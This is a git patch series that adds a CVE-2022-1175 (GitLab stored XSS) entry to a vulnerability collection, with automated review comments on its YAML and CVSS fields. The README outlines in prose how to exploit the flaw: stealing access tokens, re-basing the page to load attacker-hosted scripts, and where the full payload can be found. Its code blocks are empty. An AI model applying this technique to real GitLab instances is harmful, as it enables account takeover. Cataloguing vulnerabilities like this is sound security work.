From 1c07655c168b0687b5fc25646c597f4fe24f3d9d Mon Sep 17 00:00:00 2001 From: SipengXie Date: Fri, 7 Apr 2023 18:24:25 +0800 Subject: [PATCH 1/4] Add CVE-2022-1175 --- cve/gitlab/2022/CVE-2022-1175/README.md | 14 ++++++++++++++ cve/gitlab/2022/yaml/CVE-2022-1175.yaml | 24 ++++++++++++++++++++++++ 2 files changed, 38 insertions(+) create mode 100644 cve/gitlab/2022/CVE-2022-1175/README.md create mode 100644 cve/gitlab/2022/yaml/CVE-2022-1175.yaml diff --git a/cve/gitlab/2022/CVE-2022-1175/README.md b/cve/gitlab/2022/CVE-2022-1175/README.md new file mode 100644 index 00000000..73862290 --- /dev/null +++ b/cve/gitlab/2022/CVE-2022-1175/README.md @@ -0,0 +1,14 @@ + +# CVE-2022-1175 + +Gitlab Stored XSS, can be set in an issue on a project, either your own or another users. Allows attacks such as creating & stealing a Personal Access Token (PAT) of anyone who visits an issue. PAT's can then provide full Gitlab API access as that user equivilent to a full account takeover. + +Can be abused by changing the base of the project to your site, so scripts are sourced by your site. Change javascript on your site to match the script names being called in the page. This can break things on the page though. + +```
``` +Standard script include also works depending on the sites CSP policy. This is more stealthy. +```
``` +GitLab devs handily included the full XSS string in the code which can be found here: +https://gitlab.com/gitlab-org/gitlab/-/compare/v14.9.1-ee...v14.9.2-ee?from_project_id=278964&page=4 +*Reference:* +https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-1175 diff --git a/cve/gitlab/2022/yaml/CVE-2022-1175.yaml b/cve/gitlab/2022/yaml/CVE-2022-1175.yaml new file mode 100644 index 00000000..a0c085bb --- /dev/null +++ b/cve/gitlab/2022/yaml/CVE-2022-1175.yaml @@ -0,0 +1,24 @@ +id: CVE-2022-1175 +source: https://github.com/Greenwolf/CVE-2022-1175 +info: + name: Gitlab XSS存储 + severity: high + description: | + - Gitlab CE/EE版本中用户输入的不当处理允许攻击者通过注入Notes中的HTML来利用XSS。 + scope-of-influence: + GitLab CE/EE 14.4.x < 14.7.7 + GitLab CE/EE 14.8.x < 14.8.5 + GitLab CE/EE 14.9.x < 14.9.2 + reference: + - http://packetstormsecurity.com/files/166829/Gitlab-14.9-Cross-Site-Scripting.html + - https://gitlab.com/gitlab-org/cves/-/blob/master/2022/CVE-2022-1175.json + - https://gitlab.com/gitlab-org/gitlab/-/issues/353370 + - https://hackerone.com/reports/1481207 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:H/A:N + cvss-score: 8.7 + cve-id: CVE-2022-1175 + cwe-id: CWE-79 + cnvd-id: None + kve-id: None + tags: cve2022, gitlab \ No newline at end of file -- Gitee From 043bdb0bb1fa9b277139e702af69685a18b583a2 Mon Sep 17 00:00:00 2001 From: SipengXie Date: Mon, 10 Apr 2023 14:46:35 +0800 Subject: [PATCH 2/4] update CVE-2022-1175.yaml --- cve/gitlab/2022/yaml/CVE-2022-1175.yaml | 10 +++++----- 1 file changed, 5 insertions(+), 5 deletions(-) diff --git a/cve/gitlab/2022/yaml/CVE-2022-1175.yaml b/cve/gitlab/2022/yaml/CVE-2022-1175.yaml index a0c085bb..e00dec60 100644 --- a/cve/gitlab/2022/yaml/CVE-2022-1175.yaml +++ b/cve/gitlab/2022/yaml/CVE-2022-1175.yaml 
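Review bot: In the new CVE-2022-1175.yaml, `scope-of-influence:` is followed by three bare lines (`GitLab CE/EE 14.4.x < 14.7.7` …) with no `|` indicator and no `- ` markers, so a YAML parser folds them into a single plain scalar, `GitLab CE/EE 14.4.x < 14.7.7 GitLab CE/EE 14.8.x < 14.8.5 GitLab CE/EE 14.9.x < 14.9.2`, rather than three version ranges; if they are meant to stay distinct, write `scope-of-influence: |` or a list (I cannot see the original indentation in this view, but neither form is present). `cnvd-id: None` and `kve-id: None` are the string "None", not YAML null (only `null`/`~` parse as null), so a consumer that detects a missing ID with a null check will see a value here — use `null` if that is the intent, or keep the string form only if the rest of the corpus does the same. `source:` points at a third-party PoC repository that readers of this corpus will be sent to; recording the commit hash you reviewed next to the URL guards against the repository's contents changing after the fact.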
@@ -1,10 +1,10 @@ id: CVE-2022-1175 source: https://github.com/Greenwolf/CVE-2022-1175 info: - name: Gitlab XSS存储 - severity: high + name: GitLab是由GitLab Inc.开发,一款基于Git的完全集成的软件开发平台。 + severity: medium description: | - - Gitlab CE/EE版本中用户输入的不当处理允许攻击者通过注入Notes中的HTML来利用XSS。 + Gitlab CE/EE版本中用户输入的不当处理允许攻击者通过注入Notes中的HTML来利用XSS。 scope-of-influence: GitLab CE/EE 14.4.x < 14.7.7 GitLab CE/EE 14.8.x < 14.8.5 @@ -15,8 +15,8 @@ info: - https://gitlab.com/gitlab-org/gitlab/-/issues/353370 - https://hackerone.com/reports/1481207 classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:H/A:N - cvss-score: 8.7 + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 cve-id: CVE-2022-1175 cwe-id: CWE-79 cnvd-id: None -- Gitee From b8de81aa53e0fb3297c5a0d11d356b30954b6ab9 Mon Sep 17 00:00:00 2001 From: SipengXie Date: Tue, 11 Apr 2023 17:54:08 +0800 Subject: [PATCH 3/4] update other_list: add gitlab:cve-2022-1175 --- other_list.yaml | 12 +++++++++++- 1 file changed, 11 insertions(+), 1 deletion(-) diff --git a/other_list.yaml b/other_list.yaml index c9f163e3..d18f974b 100644 --- a/other_list.yaml +++ b/other_list.yaml @@ -1,6 +1,7 @@ #此收录漏洞列表为非openKylin发行版用例。 cve: linux-kernel: + - CVE-2017-1000112 - CVE-2019-16884 - CVE-2021-33909 - CVE-2021-3493 @@ -12,6 +13,8 @@ cve: - CVE-2021-33624 - CVE-2020-27194 - CVE-2023-0179 + - CVE-2018-18955 + - CVE-2011-4917 polkit: - CVE-2021-3560 Outlook: @@ -33,6 +36,8 @@ cve: - CVE-2022-22978 apache-commons-text: - CVE-2022-42889 + apache-Struts: + - CVE-2018-11776 unzip: - CVE-2022-0529 django: @@ -41,7 +46,7 @@ cve: - CVE-2019-14287 MinIO: - CVE-2023-28432 - WebLogic: + WebLogic: - CVE-2023-21839 Node.js: - CVE-2021-21315 @@ -49,7 +54,12 @@ cve: - CVE-2022-23131 weblogic: - CVE-2022-2555 + - CVE-2021-2109 Zyxel: - CVE-2022-30525 + WordPress: + - CVE-2019-8942 + Gitlab: + - CVE-2022-1175 cnvd: -- Gitee From c1c0bb112cac845ed183fe42d8cc95dab70adbe4 Mon Sep 17 00:00:00 2001 
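Review bot: In the first hunk `name:` now holds a sentence describing the product (`GitLab是由GitLab Inc.开发,一款基于Git的完全集成的软件开发平台。`) instead of naming the vulnerability, so anything that lists entries by `name` will show the same product blurb for every GitLab CVE and lose the "stored XSS" identification the old value carried. I would keep a vulnerability title such as `name: GitLab Notes 存储型 XSS` and move the product sentence into the `description` block as its first line, which this same hunk is already reworking. The drop of `severity` to medium has no rationale in the commit message (`update CVE-2022-1175.yaml`); one line naming the scoring source it follows would let the next reviewer check it.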
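Review bot: The replacement vector `CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N` sets PR:N (no privileges), which contradicts the entry's own description: injecting HTML into Notes requires an account that can post a note, i.e. PR:L, and the 8.7 vector being removed kept PR:L. The 6.1 score is the generic value that follows from PR:N/UI:R/S:C/C:L/I:L, so it inherits the same error; as far as I recall, both GitLab's advisory (the 8.7 vector removed here) and NVD (5.4) rate this with PR:L, so if the intent is to align with NVD the lines should read `cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N` and `cvss-score: 5.4` — please verify against the source you used. Whichever source is chosen, adding it under `reference` makes the score reproducible.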
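Review bot: The last hunk of other_list.yaml adds the new product key as `Gitlab:` while the entry this series adds writes the vendor's own spelling `GitLab` (`GitLab CE/EE 14.4.x`, `GitLab是由GitLab Inc.开发`), and the same file already carries the split pair `WebLogic:` / `weblogic:` (hunks @@ -41 and @@ -49), which shows how case drift leaves one product under two keys that a lookup by name will not merge. Use `GitLab:` here and, as a separate change, fold `weblogic:` into `WebLogic:`. The other additions in this patch (CVE-2017-1000112, CVE-2018-18955, CVE-2011-4917, the apache-Struts, CVE-2021-2109 and WordPress entries) appear unrelated to the stated subject and are removed again in PATCH 4/4; squashing the series would keep that add-then-revert out of history.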
From: =?UTF-8?q?=E8=B0=A2=E6=80=9D=E8=8A=83?= Date: Mon, 17 Apr 2023 04:40:51 +0000 Subject: [PATCH 4/4] =?UTF-8?q?=E4=BF=AE=E6=94=B9other=5Flist.yaml?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit Signed-off-by: 谢思芃 --- other_list.yaml | 13 ++----------- 1 file changed, 2 insertions(+), 11 deletions(-) diff --git a/other_list.yaml b/other_list.yaml index d18f974b..d7a7ccb8 100644 --- a/other_list.yaml +++ b/other_list.yaml @@ -1,7 +1,6 @@ #此收录漏洞列表为非openKylin发行版用例。 cve: linux-kernel: - - CVE-2017-1000112 - CVE-2019-16884 - CVE-2021-33909 - CVE-2021-3493 @@ -13,8 +12,6 @@ cve: - CVE-2021-33624 - CVE-2020-27194 - CVE-2023-0179 - - CVE-2018-18955 - - CVE-2011-4917 polkit: - CVE-2021-3560 Outlook: @@ -36,8 +33,6 @@ cve: - CVE-2022-22978 apache-commons-text: - CVE-2022-42889 - apache-Struts: - - CVE-2018-11776 unzip: - CVE-2022-0529 django: @@ -46,7 +41,7 @@ cve: - CVE-2019-14287 MinIO: - CVE-2023-28432 - WebLogic: + WebLogic: - CVE-2023-21839 Node.js: - CVE-2021-21315 @@ -54,12 +49,8 @@ cve: - CVE-2022-23131 weblogic: - CVE-2022-2555 - - CVE-2021-2109 Zyxel: - CVE-2022-30525 - WordPress: - - CVE-2019-8942 Gitlab: - CVE-2022-1175 -cnvd: - +cnvd: \ No newline at end of file -- Gitee
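Review bot: In the last hunk the rewritten tail `+cnvd:` arrives with `\ No newline at end of file`, so this patch removes the trailing newline the file previously had; restore it so the next diff against this file does not begin with a whitespace-only change. `cnvd:` with no value also parses as null rather than an empty mapping, so code that iterates `cnvd` the way it iterates `cve` must special-case it; `cnvd: {}` states the empty section explicitly. The `WebLogic:` line in hunk @@ -46,7 +41,7 is changed with no visible difference in its text, presumably whitespace; a word in the commit message would save the reader from guessing.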